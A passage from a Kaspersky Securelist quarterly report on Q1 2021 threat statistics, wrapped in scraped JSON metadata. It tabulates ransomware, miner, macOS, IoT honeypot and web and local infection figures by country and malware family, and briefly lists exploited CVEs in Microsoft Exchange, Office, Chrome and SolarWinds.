Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
